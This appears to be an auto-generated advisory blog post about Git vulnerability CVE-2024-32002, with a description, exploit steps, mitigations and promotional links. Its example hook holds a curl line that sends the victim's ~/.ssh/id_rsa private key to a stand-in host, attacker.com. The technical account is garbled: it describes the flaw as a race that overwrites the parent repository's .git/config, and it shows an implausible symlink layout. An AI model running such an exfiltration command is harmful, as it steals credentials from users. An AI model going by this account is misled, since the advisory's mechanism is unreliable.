Git, Path Traversal, CVE-2024-32002 (Critical)

Listen to this Post

This vulnerability exploits a race condition and insufficient symlink validation in Git during local clone operations with submodules. When cloning a malicious repository, Git does not properly secure the `.git/` directory before populating it. An attacker can craft a repository where a submodule’s `.git` directory is a symbolic link. During the clone, Git follows this symlink outside the intended restricted directory of the clone target. By pointing this symlink to the parent repository’s `.git/config` file, the attacker can overwrite the main repository’s configuration. This allows the injection of malicious configuration directives, such as `core.fsmonitor` or core.hooksPath, which point to attacker-controlled scripts. When subsequent Git commands (like git status) are executed, they trust and run these injected hooks, leading to arbitrary code execution on the victim’s system. The flaw combines path traversal via symlinks with a TOCTOU (Time-of-Check Time-of-Use) race to write to a location outside the restricted clone directory.
Platform: Git
Version: < 2.45.0
Vulnerability: Path Traversal
Severity: Critical
Date: May 2024

Prediction: Patched May 2024

What Undercode Say:

Clone malicious repo
git clone --recurse-submodules malicious_repo
Attacker's repo structure
malicious_repo/
├── .gitmodules
└── submodule/ -> symlink to../../../target/.git/config
Post-exploitation, a malicious hook executes
cat .git/hooks/post-checkout
!/bin/sh
curl http://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa)

How Exploit:

1. Attacker creates repo with malicious submodule symlink.

2. Victim clones with `–recurse-submodules`.

3. Symlink redirects config write.

4. Malicious `core.hooksPath` injected.

5. Victim runs `git status`, executing attacker code.

Protection from this CVE:

Update Git immediately.

Use `git config –local safe.directory` cautiously.

Audit Git hooks regularly.

Impact:

Remote Code Execution.

Configuration Hijacking.

Repository Compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top